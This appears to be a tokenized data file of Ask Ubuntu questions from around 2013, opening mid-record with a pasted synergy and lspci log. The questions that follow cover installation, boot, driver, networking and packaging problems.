/home/linux-user not ours . connection failure : connection refused pa_context_connect ( ) failed : connection refused ** message : applet now removed from the notification area ** ( nm-applet:2199 ) : warning ** : failed to register as an agent : ( 32 ) no session found for uid 0 ** message : using fallback from indicator to gtkstatusicon ** message : applet now embedded in the notification area 2013-04-06t10:51:32 info : synergy 1.3.8 server on linux 3.5.0-26-generic # 42~precise1-ubuntu smp mon mar 11 22:17:58 utc 2013 x86_64 /build/buildd/synergy-1.3.8/src/cmd/synergys/synergys.cpp,1098 2013-04-06t10:51:32 debug : opening configuration `` /root/.synergy.conf '' /build/buildd/synergy-1.3.8/src/cmd/synergys/synergys.cpp,1113 2013-04-06t10:51:32 debug : can not open configuration `` /root/.synergy.conf '' /build/buildd/synergy-1.3.8/src/cmd/synergys/synergys.cpp,1120 2013-04-06t10:51:32 debug : opening configuration `` /etc/synergy.conf '' /build/buildd/synergy-1.3.8/src/cmd/synergys/synergys.cpp,1113 2013-04-06t10:51:32 debug : can not open configuration `` /etc/synergy.conf '' /build/buildd/synergy-1.3.8/src/cmd/synergys/synergys.cpp,1120 synergys : no configuration available ** message : starting applet secret agent because gnome shell disappeared ** ( nm-applet:2199 ) : warning ** : failed to register as an agent : ( 32 ) no session found for uid 0 2013-04-06t10:51:37 info : synergy 1.3.8 client on linux 3.5.0-26-generic # 42~precise1-ubuntu smp mon mar 11 22:17:58 utc 2013 x86_64 /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,765 2013-04-06t10:51:37 debug : xopendisplay ( `` :8 '' ) /build/buildd/synergy-1.3.8/src/lib/platform/cxwindowsscreen.cpp,901 2013-04-06t10:51:37 debug : xscreensaver window : 0x01600001 /build/buildd/synergy-1.3.8/src/lib/platform/cxwindowsscreensaver.cpp,342 2013-04-06t10:51:37 debug : screen shape : 0,0 640x480 /build/buildd/synergy-1.3.8/src/lib/platform/cxwindowsscreen.cpp,136 2013-04-06t10:51:37 debug : window is 0x00e00004 /build/buildd/synergy-1.3.8/src/lib/platform/cxwindowsscreen.cpp,137 2013-04-06t10:51:37 debug : opened display /build/buildd/synergy-1.3.8/src/lib/synergy/cscreen.cpp,41 2013-04-06t10:51:37 note : started client /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,339 2013-04-06t10:51:37 note : connecting to '127.0.0.1 ' : 127.0.0.1:24800 /build/buildd/synergy-1.3.8/src/lib/client/cclient.cpp,115 2013-04-06t10:51:37 warning : failed to connect to server : connection refused /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,274 2013-04-06t10:51:37 debug : retry in 1 seconds /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,246 2013-04-06t10:51:38 note : connecting to '127.0.0.1 ' : 127.0.0.1:24800 /build/buildd/synergy-1.3.8/src/lib/client/cclient.cpp,115 2013-04-06t10:51:38 warning : failed to connect to server : connection refused /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,274 2013-04-06t10:51:38 debug : retry in 1 seconds /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,246 2013-04-06t10:51:39 note : connecting to '127.0.0.1 ' : 127.0.0.1:24800 /build/buildd/synergy-1.3.8/src/lib/client/cclient.cpp,115 2013-04-06t10:51:39 warning : failed to connect to server : connection refused /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,274 2013-04-06t10:51:39 debug : retry in 1 seconds /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,246 2013-04-06t10:51:40 note : connecting to '127.0.0.1 ' : 127.0.0.1:24800 /build/buildd/synergy-1.3.8/src/lib/client/cclient.cpp,115 2013-04-06t10:51:40 warning : failed to connect to server : connection refused /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,274 2013-04-06t10:51:40 debug : retry in 1 seconds /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,246 2013-04-06t10:51:42 note : connecting to '127.0.0.1 ' : 127.0.0.1:24800 /build/buildd/synergy-1.3.8/src/lib/client/cclient.cpp,115 2013-04-06t10:51:42 warning : failed to connect to server : connection refused /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,274 2013-04-06t10:51:42 debug : retry in 1 seconds /build/buildd/synergy-1.3.8/src/cmd/synergyc/synergyc.cpp,246 linux-user @ marble : ~ $ 2013-04-06t10:51:43 note : connecting to '127.0.0.1 ' : 127.0.0.1:24800 i think that something has gone wrong in starting up the lxde session ( i see a lot of failed messages ) so i 'm hoping that you guys can help . if you need any more details about the system or how i installed it i will be happy to give them . thanks for any ideas on how this could be fixed.= ) output of uname -r this ( top line is the command ) linux-user @ marble : ~ $ uname -r 3.5.0-27-generic output of lspci -v this ( top line is the command ) linux-user @ marble : ~ $ lspci -v 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) subsystem : asustek computer inc. device 1117 flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : c0000000-d30fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 1532 flags : bus master , fast devsel , latency 0 , irq 49 memory at d3400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at e080 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) subsystem : asustek computer inc. device 1117 flags : bus master , fast devsel , latency 0 , irq 47 memory at d9c0a000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. device 1117 flags : bus master , medium devsel , latency 0 , irq 16 memory at d9c08000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) subsystem : asustek computer inc. device 1113 flags : bus master , fast devsel , latency 0 , irq 48 memory at d9c00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 0000c000-0000cfff memory behind bridge : d8800000-d9bfffff prefetchable memory behind bridge : 00000000d3100000-00000000d32fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 0000b000-0000bfff memory behind bridge : d7400000-d87fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 0000a000-0000afff memory behind bridge : d6000000-d73fffff prefetchable memory behind bridge : 00000000d9d00000-00000000d9efffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=0 i/o behind bridge : 00009000-00009fff memory behind bridge : d4c00000-d5ffffff prefetchable memory behind bridge : 00000000d9f00000-00000000da0fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=06 , subordinate=06 , sec-latency=0 i/o behind bridge : 00008000-00008fff memory behind bridge : d3800000-d4bfffff prefetchable memory behind bridge : 00000000da100000-00000000da2fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. device 1117 flags : bus master , medium devsel , latency 0 , irq 23 memory at d9c07000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=07 , subordinate=07 , sec-latency=32 capabilities : < access denied > 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) subsystem : asustek computer inc. device 1117 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel modules : lpc_ich 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : asustek computer inc. device 1117 flags : bus master , 66mhz , medium devsel , latency 0 , irq 46 i/o ports at e070 [ size=8 ] i/o ports at e060 [ size=4 ] i/o ports at e050 [ size=8 ] i/o ports at e040 [ size=4 ] i/o ports at e020 [ size=32 ] memory at d9c06000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci kernel modules : ahci 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) subsystem : asustek computer inc. device 1117 flags : bus master , fast devsel , latency 0 , irq 18 memory at d9c04000 ( 64-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : intel ips kernel modules : intel_ips 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 425m ] ( rev ff ) ( prog-if ff ) ! ! ! unknown header type 7f 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : azurewave aw-ne785 / aw-ne785h 802.11bgn wireless full or half-size mini pcie card flags : bus master , fast devsel , latency 0 , irq 17 memory at d7400000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k kernel modules : ath9k 04:00.0 usb controller : fresco logic fl1000g usb 3.0 host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : asustek computer inc. device 1039 physical slot : 3 flags : bus master , fast devsel , latency 0 , irq 19 memory at d6000000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 06:00.0 ethernet controller : atheros communications inc. ar8131 gigabit ethernet ( rev c0 ) subsystem : asustek computer inc. device 1820 physical slot : 5 flags : bus master , fast devsel , latency 0 , irq 50 memory at d3800000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at 8000 [ size=128 ] capabilities : < access denied > kernel driver in use : atl1c kernel modules : atl1c ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0 ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) subsystem : intel corporation device 8086 flags : bus master , fast devsel , latency 0
278625	stuck at almost finished copying files	to install ubuntu i used the windows installer , and after reboot im stuck at `` almost finished copying files ... '' . have been here for 20mins , is this normal ?
278626	installer hangs during installation at `` select location '' screen	i never seem to be able to get a linux distro to install . now i 'm trying ubuntu and running into a problem . i installed via virtualbox first and it worked fine . the installer from the boot disk starts up fine . it created the partition ( dual boot with windows 7 ) , copies the files , and that 's it . it sits there doing nothing . at this point i am on the screen where it asks me to choose my location , and all i get is a spinning cursor telling me it 's trying to do something , but it does n't really do anything even after 10 minutes of waiting . system : intel i3-2100 8gb ddr3 ram 120gb ssd main drive + 3 1tb sata windows 7 nvidia gt650 video card i 'm using the ubuntu 12.04 64-bit image .
278634	command for reporting free/used space on *unmounted* partitions ?	are there any commands that reports free ( or used ) space left on unmounted partitions ? the partitions will have either ntfs , fat or ext2|3|4 filesystems ... a bonus would be a program that also reported partitions without filesystems and unpartitioned free-space . i 'm not after anything complex like gparted , just something giving a quick list of space used/left ( like df ) . preferably text-based ( no gui or complex cli , just a list ) . the reason i ask , is that i have several ( many ! ) external hard-drives , and would like to quickly find out which have space left , without jumping through too many hoops ( like actually mounting and unmounting them ) . i remember encountering such a program as an utility on the installations disk for some os ( not sure if it was a linux-distro or not ) , but ca n't remember which or what the utility was called .
278645	only in ubuntu 12.10 chrome on youtube , videos are all playing with grain particles all over	it is a clean install of ubuntu and chrome . videos play normal on other video sites like dailymotion . and videos play well on youtube if i use firefox . chrome version 26.0.1410.43 ubuntu 12.10 x64 i installed oracle java 7 and ubuntu-restricted-extras which , i think , includes latest version of flash player .
278648	how do i connect to canon pixma mx860 printer via usb	i have used the `` system settings '' printer tool to configure for usb connect to my canon pixma mx860 printer . it says that that worked , and when i hit the `` print test page '' button it says that that worked also . but nothing prints ?
278649	poor internet speed on ubuntu 12.04 lts	i am using linux ( ubuntu 12.04 lts ) for the first time , i installed it along side windows 8 but the internet speed on ubuntu is die too slow , can some help with a hint of how to go about improving the internet speed . not evening opening web pages . i did the installation on dell vostro 1540. thanks in advance
278651	windows ntfs partition shows up as hfs+	i 'm using ubuntu 13.04 ( beta 2 ) on my macbook . was using windows 8 ( with no os x ) up until today , and i 've decided to move to ubuntu 13.04 today . however , i have a storage partition formatted as ntfs which , unfortunately , i ca n't mount in ubuntu , because it is not recognized correctly and shows up as a hfs+ partition , which i am sure is n't . could you please provide me some help ? i will post whatever you require ( dmesg , system logs , etc ... ) edit : downloading winpe now , will try running chkdsk from it tomorrow . hope it works .
278658	sapphire 7970 does not show up on lspci	i just put a new sapphire 7970 graphics card into my rig , but it does not show up when i run lspci . is there something i have to do to get it to show up or does that mean i do n't have it installed appropriately ? thanks , ben
278663	dual monitor extended desktop setup randomly falling back to mirror mode	i just have this strange behavior and could n't find out what is wrong . anyone ever saw this kind of error ? i checked the xorg log , but was n't able to identify any obvious error . my setup : notebook as first monitor ( 1366x768 ) samsung p2370 as secondary monitor ( 1920x1080 ) dell inspiron 15r ubuntu 12.04 fully updated ati proprietary drivers lspci relevant output : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m series ] fglxinfo output : opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7400m series opengl version string : 4.2.12172 compatibility profile context 12.10.17 i can attach xorg conf/log , if someone points me the relevant sections . thanks for any help .
278665	ca n't boot past login screen	i 'm new to ubuntu . i just installed 12.10 last night and was installing some applications . i was working on installing wine . when i entered a command from online trying to figure it out the command ended with `` purge wine* '' because i had installed a wine package and it would n't boot . i figured i could delete it . well it started deleting all my applications on my system so i cancelled it by the time i realized . now when i try to login , it allows me to login and just boots to a blank screen . i can get to the terminal from the login and i tried to use the command : sudo dpkg-reconfigure -phigh -a to reinstall ubuntu to a fresh start but that would n't let me . is there another idea i can try before i delete the partion and reinstall ? i just figure there has to be a way . thanks in advance for the help .
278666	asus eeepc - screen brightness issue	i have asus 1015cx netbook on which i have installed ubuntu 12.04lts . all seem to work fine however there is an issue with brightness settings ; changing the brightness ( both through settings and with hotkeys ) has no effect . however once i log off or power down the screen brightness drops to minimal level . i have to log in and out again for the brightness to increase . how can i fix this ?
278671	how can i set windows as the default os in grub ?	i'á¸ż a new user of ubuntu , but i need windows for official purposes , so i have both systems on my pc . can some one tell me how to configure ( i prefer graphical support . like bootadministrator ' ) grub to start with windows as the default os instead ubuntu ?
278672	why would dpkg not auto-rename .conf files on -- unpack on an installed package ?	i was testing a few things and was wondering about the difference between -- auto-deconfigure and -- unpack . dpkg -- auto-deconfigure -- install p.deb if p has a break field such as : break : b and b is currently installed , then dpkg deconfigures b with a new status of `` half-configured . '' similarly , you could `` unpack '' b first : dpkg -- install b.deb ... dpkg -- unpack b.deb dpkg -- install p.deb in which case b new status is `` unpacked '' . however , in both cases the /etc/b.conf file stays right there . so it looks like the package is still fully installed . my question is : why would n't dpkg remove or rename b.conf ? because when i just do the -- unpack the configuration file is named : /etc/b.conf.dpkg-new which makes sense . in that case b is really not configured ! it seems to be that the -- auto-deconfigure or -- unpack commands should also rename the /etc/b.conf as /etc/b.conf.dpkg-new then a -- configure can restore the file as expected . i guess that most software do not care whether a .conf exists and thus whether it is there or not does n't make much difference in the end . would that be the reason why they can as well leave it in place ?
278674	can we have broken software removed from the software center ?	the ubuntu software center does a fantastic job of inviting new users to explore and try out the software in ubuntu 's repositories . i do n't have much experience with it but recently decided to give it a go . i searched for a topic of my interest and installed two applications that sounded promising . both were so terrible that i actively want them removed from the ubuntu software center . one was dysfunctional enough that i 'd be happy to see it removed from ubuntu 's repositories completely . what is the proper forum for making such a suggestion ? is there any precedent for this kind of curation ?
278679	12.10 64 bit ubuntu wo n't boot , grub rescue , file /boot/grub/i386-pc/normal.mod not found	i bought a new computer a couple of weeks ago and installed ubuntu from a book dvd . everything went fine and i was happily using ubuntu until i found out that it was the 32 bit version . i want to use the 64 bit version since i just spent the money to replace my old computer with a 64 bit system . i created a dvd with the 64 bit iso from the ubuntu site and installed that . the installation goes fine and says that it completes successfully but when i reboot the system i get a message error : file '/boot/grub/i386-pc/normal.mod ' not found grub rescue i can boot from the install dvd and i can see that 64 bit ubuntu runs fine on my system and have used that to try some of the suggestions i have seen on this site and on google but have not found one that works . from the grub prompt and from running the ubuntu dvd i can see that i do have a directory named /boot/grub/x86_64-efi which seems like the 64 bit analogue to i386-pc directory and which has a lot of .mod files in it . to my simple understanding it seems like grub is confused and is looking for its mod files in the 32 bit directory which does n't exist rather than in the the 64 bit directory which does exist . and then , it seems like if i could tell grub to look in the right place i might be on my way to getting ubuntu to boot . does anybody have a solution for this problem ?
278684	what characters to escape in terminal ?	i know , that there are several characters that should be escaped . for example : $ cd /home/username\ with\ spaces/desktop i know another option is to enclose it in single-quotes . $ cd '/home/username with spaces/desktop' is there a complete list of these characters ? or any rule of thumb ?
278690	cantor does n't recognize the sage backend	i installed the package cantor-backend-sage , and then started up cantor , but sage is n't one of the options for the backend when it starts up . how can i get cantor to use sage as a backend ?
278693	how do i stop orca screen reader ?	i accidentally opened orca screen reader from the dash when i was trying to open screenshot . now everything i type or click on is spoken out loud . how do i make it stop ? for reference , here is a screenshot of orca screen reader running :
278698	password not accepted at login	i had tried to setup kerberos authentication to log into some ads thing at my new university , however that did n't work and resulted in me having to enter my password twice for everything . so i did : sudo apt-get remove libpam-krb5 then some authentication tool came up asking if i wanted to ignore local changes ( ? ) to which i entered yes . then i restarted , now i ca n't login . i tried to do recovery mode and enter into the root prompt , but apparently it is in read-only mode .
278700	create a bootable usb drive for installing linux	i have a netbook that i would like to start using agan and and need to reinstall things ( i think an update broke a bunch and it is faster to rebuild vs figuring it out . anyways i have my macbook air that i would like to create a bootable usb drive on it to install linux on my netbook . most of the steps that i 've found googling are for installing ubuntu on a mac , which is not what i want to do . i would like to build the bootable key on my mac to install linux on my netbook . did some searching on this site and a lot of questions linked back to problems with making a bootable usb drive on a mac which is all about creating a bootable usb for installing linux on mac . any help would be greatly appreciated .
278707	i really need to restore my laptop	i really need to restore my laptop back to factory settings because i screwed it up using ubuntu . how can i restore it ?
278709	can i install ubuntu phone on galaxy s ii using some nexus image ?	there is a post at https : //wiki.ubuntu.com/touch/install ? action=show & redirect=touchinstallprocess where you can read about the process installation for ubuntu phone on galaxy nexus ( some models ) . but , is possible do this on a galaxy s ii ? thanks for your time . sergio .
278712	how can i enable/disable dash online results programmatically ?	how can i change this setting from a bash script ? my plan is to enable it only on certain network connections .
278713	unable to run tor even in terminal , vidalia exit code 127	i 'm using ubuntu 12.10 ( quantal ) and i recently installed tor ( 32 bits ) following the instructions on the tor project 's page . then i started the script after having it extracted from the console and got this : master @ ubuntu : ~/tor-browser_en-us $ ./start-tor-browser launching tor browser bundle for linux in /home/master/tor-browser_en-us ./start-tor-browser : 225 : ./start-tor-browser : ./app/vidalia : not found vidalia exited abnormally . exit code : 127 then i ran vidalia from the console and : master @ ubuntu : ~/tor-browser_en-us $ vidalia ( < unknown > :11354 ) : ibus-warning ** : unable to load /var/lib/dbus/machine-id : failed to open file '/var/lib/dbus/machine-id ' : permission denied master @ ubuntu : ~/tor-browser_en-us $ vidalia ( < unknown > :11358 ) : ibus-warning ** : unable to load /var/lib/dbus/machine-id : failed to open file '/var/lib/dbus/machine-id ' : permission denied and after vidalia 's gui opens i get the error prompt about starting tor : '' vidalia was unable to start tor . check your settings to ensure the correct name and location of your tor executable is specified . '' how can i start tor ?
278714	ralink 539b no wifi	i just installed ubuntu 12.10 on my laptop and i ca n't get wifi . i installed the bcmwl kernal- driver thing and it still did n't work my bluetooth does n't work either , which driver do i need and can somebody show me how to install it . help would be appreciated .
278717	how to remove the unity launcher icon by setting its size to zero ?	is there a way ( on ubuntu 12.10 ) to manually set the launcher icon size to 0 to permanently hide it ? i hate the launcher after they removed dodge windows and i 'm using cairo now for my dock .
278725	installing wireless driver on ubuntu 12.10 distribution	brand new to the linux community . i have an hp mini 1000 that does n't have an ethernet port . i 'm transferring everything to it via a flash drive . i 'm following the instructions for 'b43 - no internet access ' on the wiki . here 's what 's going on in my terminal . what would the command in step 3 be in 12.10 ? i 'd appreciate any help !
278727	keyboard skips keystrokes with safetype keyboard ( gnome/xfce )	i have bought a new safetype keyboard ( www.safetype.com ) . the problem is that during typing , i notice that certain keys are skipped ( at random ) . this is not just that i miss something . most commonly missed keys are when they are repeated . some examples are : 1 . down/up arrow keys . 2 . alt-tab to switch windows . i searched for web and found in linux + ubuntu forums and found similar issues but none of the solution worked with me . ( switch off/on bounce keys etc ) . i tried the keyboard on 2 different computers and found the same result . i tried on ubuntu 11.10 , 12.04 and 12.10 . however i tried it shortly on my laptop ( on ubunut/windows ) and did n't see the similar behaviour so my feeling is that keyboard is good but there is issue in either a ) usb driver b ) x window drive . i do n't see anything odd in `` dmesg '' or /var/log/messages . my keyboard is detected by kernel as : [ 3.556781 ] input : plus more enterprise ltd. usb-compliant keyboard as /devices/pci0000:00/0000:00:12.1/usb4/4-2/4-2:1.0/input/input2 i tried gnome/xfce and found the similar issue . i tried the console prompt but ca n't say for sure if issue exist there or not . motherboard of the pc : asus m4a785-m . questions i have is what should i do to diagnose the issue further . i have been using linux for more than a decade . i noticed the similar bug e.g https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/34501 https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/717970 but i do n't think the issue is same .
278732	how to remove duplicate tracks from rhythmbox ?	i have rhythmbox 2.97 on 32bit ubuntu 12.10 . i have a large number of duplicate music entries that do n't show up in my music folder . i really would like to know if there 's any plugin or any means to get rid of them .
278733	installing diablo 2 on ubuntu 12.10	i am new to ubuntu i am trying to install the game diablo 2 . i have followed all pointers i can find on installing on ubuntu and i cant get it to work . i have tried using furiusiso and gmountiso , gmount asks for a password , when i put it in it does nothing . furius says the image is not compatible . the .bin image mounts but does nothing and the .cue image is where i get the error message .
278740	is it possible to unmount the /home partition ?	i want to recover some files in my home directory using extundelete http : //sourceforge.net/projects/extundelete/ this tool needs to unmount the device before start to work , but i can not umount /home : $ sudo umount /home umount : /home : not mounted
278742	network services not compatible after update	i have installed ubuntu 12.04 lts on my laptop and recently brought my software up-to-date ( through update manager ) . since the update , i ca n't use any of network services . during boot-up it shows messages like `` waiting for network configuration '' and `` booting without network configuration '' , even though my ethernet cable is plugged in . on the right upper corner , the icon for network connections does n't exist anymore , so there 's no wifi either . should i simply reinstall ubuntu or is there some other way ? note : my laptop is dual-booted , and everything runs fine in windows 8 .
278746	which target in debian/rules do i need to use for generating documentation ?	i have run into some problems creating debian packaging for a shared library . the application contains a doxyfile which is used to generate documentation for the library . i would like to create a libfoo-doc package which includes the documentation . in order to generate the documentation , i have the following lines in debian/rules : # ! /usr/bin/make -f build-indep : cd $ ( destdir ) /share/doc/libfoo-doc ; doxygen % : dh $ @ however , this target never gets built , despite what this page claims : '' the binary target must be all that is necessary for the user to build the binary package ( s ) produced from this source package . it is split into two parts : binary-arch builds the binary packages which are specific to a particular architecture , and binary-indep builds those which are not . '' i also tried changing build-indep to installdocs but that made no difference . what target do i need to use for generating documentation ?
278747	connecting to wifi internet using tp-link ( tl-wn723n ) usb adapter with ubuntu 12.10	i use tp-link ( tl-wn723n , ver:2.2 ) usb adapter to connect to a wifi internet using windows 7 . its wep encryption type network and using a security key i can connect to internet . but in ubuntu 12.10 i can see the wifi network is available in the network manager but every time i try to connect to it , it keeps asking for the security key over and over again . i am using the correct security key but it wo n't connect to the network ! do i have to install the correct driver for it in ubuntu ? if it is how ? its kind of confusing because the system shows that there is a wireless network available , configures the network as a wep type so it seems like the adapter is working . but it wont connect to the internet . the output of lspci lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation h67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 02:00.0 ethernet controller : broadcom corporation netlink bcm57788 gigabit ethernet pcie ( rev 01 ) and the output of lsusb lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 003 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan adapter bus 002 device 004 : id 413c:2107 dell computer corp . bus 002 device 005 : id 046d : c05a logitech , inc. optical mouse m90
278753	gui theme names	please give me some names of nice gui for linux . i tried to install kde , but i do n't like it ... and i ca n't find on internet the terminal commands for others . ps : please tell me the gui name and the terminal command ( example : $ sudo apt-get install kubuntu-desktop ) . thanks in advance !
278756	dhcp server not starting	i 'm trying to set a dhcp server on 12.04 . i installed : sudo apt-get install isc-dhcp-server my configuration files look like this : /etc/default/isc-dhcp-server interfaces= '' eth0 '' /etc/network/interfaces auto lo iface lo inet loopback /etc/dhcp/dhcpd.conf ddns-update-style none ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; log-facility local7 ; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.235 192.168.1.240 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.255 ; option routers 192.168.1.1 ; default-lease-time 100000 ; max-lease-time 100000 ; } when i run sudo service isc-dhcp-server restart i get : stop : unknown instance : isc-dhcp-server start/running , process 15384 after this if i run sudo service isc-dhcp-server status it shows that its stopped : isc-dhcp-server stop/waiting what am i doing wrong here ?
278758	why wo n't skype open or install properly on ubuntu 12.04 ?	i have attempted to install skype using the skype website for ubuntu 12.04 , and it says that i have to open it with the software centre , so when i click on the file it says error . i then followed instructions on how to install it using the terminal , which came up with errors . although the skype application button came up when i searched the computer , when i clicked on it nothing came up . the computer i 'm using is a compaq presario f500 . any suggestions as to why skype wo n't work or install ? thanks
